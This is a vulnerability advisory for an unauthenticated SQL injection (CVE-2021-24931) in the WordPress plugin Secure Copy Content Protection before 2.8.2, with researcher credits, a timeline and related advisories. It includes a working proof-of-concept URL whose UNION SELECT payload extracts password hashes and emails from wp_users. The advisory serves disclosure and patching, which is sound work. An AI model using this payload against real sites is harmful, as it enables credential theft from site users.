Secure Copy Content Protection and Content Locking < 2.8.2 – Unauthenticated SQL Injection | CVE 2021-24931 | Plugin Vulnerabilities

Description

The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection.

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20union%20select%201,user_pass,user_email,2,2,2%20from%20wp_users%20union%20select%201,1,1,1,1,1%20FROM%20wp_ays_sccp_reports%20WHERE%20(1=1%20&type=json

Affects Plugins

secure-copy-content-protection

Fixed in 2.8.2

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

1cd52d61-af75-43ed-9b99-b46c471c4231

Timeline

Publicly Published

2021-11-08 (about 4 years ago)

Added

2021-11-08 (about 4 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2023-02-17

Title

WP Coder < 2.5.4 - Admin+ SQLi

Published

2015-11-24

Title

WordPress Meta Robots <= 2.1 - Authenticated Blind SQL Injection

Published

2022-03-08

Title

Easy Social Icons < 3.1.4 - Admin+ SQL Injection

Published

2016-01-25

Title

Appointment Booking Calendar < 1.1.24 - Unauthenticated SQL Injection

Published

2015-04-21

Title

NEX-Forms - Ultimate Form builder <= 3.0 - SQL Injection